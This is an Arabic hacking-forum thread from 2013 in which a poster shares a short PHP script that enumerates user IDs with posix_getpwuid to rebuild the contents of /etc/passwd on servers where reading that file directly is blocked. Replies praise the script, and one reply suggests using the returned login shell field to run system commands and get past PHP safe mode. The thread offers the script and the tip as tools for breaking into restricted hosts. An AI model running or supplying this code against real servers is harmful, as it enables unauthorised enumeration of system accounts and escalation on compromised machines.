سكريبت بسيط لتخطي عدم عرض etc/passwd

aircrack -ng · 06-14-2013, 11:22 PM

بسم الله الرحمن الرحيم

والصلاة والسلام على نبينا الحبيب

السلام عليكم

اليوم معانا سكريبت php لتخطي عدم تنفيد الامر cat/etc/passwd

كود

كود PHP:

  <?php
for($uid=0;$uid<2000;$uid++){ //cat /etc/passwd
$nothing = posix_getpwuid($uid);
if (!empty($nothing)) {
while (list ($key, $val) = each($nothing)){
print "$val:";
}
print "<br />";
}
}
?>

اهداء لاخي
سايبر كود سايبر مافيا دوم اسد الله الدمشقي ميدو رادهات جوست قطر هجوم هكر سوير

صفصف . . . ! ,VIURIS.SA ,ABO-SAGER معجبون بهذا

المصدر: :: vBspiders Professional Network ::

s;vdfj fsd' gjo'd u]l uvq etcLpasswd

ABO-SAGER · 06-15-2013, 10:04 AM

ابداع صراحه

واصل

صفصف . . . ! ,aircrack -ng معجبون بهذا

mido868 · 06-15-2013, 03:08 PM

حبيبى دائما ننتظر موضوعاتك الحصرية ،واصل ابداعك وشكرا على الاهداء

صفصف . . . ! معجب بهذا

oblack · 06-16-2013, 08:04 AM

posix_getpwuid($user);

تعمل الدالة posix_getpwuid تستخدم للرجوع لمعلومات يوزر معين من خلال رقم اليوزر او اسمه او حتى على الشكل التالي
Array
(
[name] => tom
[passwd] => x
[uid] => 10000
[gid] => 42
[gecos] => "tom,,,"
[dir] => "/home/tom"
[shell] => "/bin/bash"
)
انا افضل ان تجرب تستخدم $_["shell"] string loginshell (/bin/slash)

عشان تقدر تنفذ اوامر النظام فا احتمالية تخطي السيف مود عليه , ملاحظة الدالة كثير من استخداماتها لاتعمل على توزيعات لينكس من نوع GNU ولكن تعمل بشكل ممتاز في توزيعات مثل BSD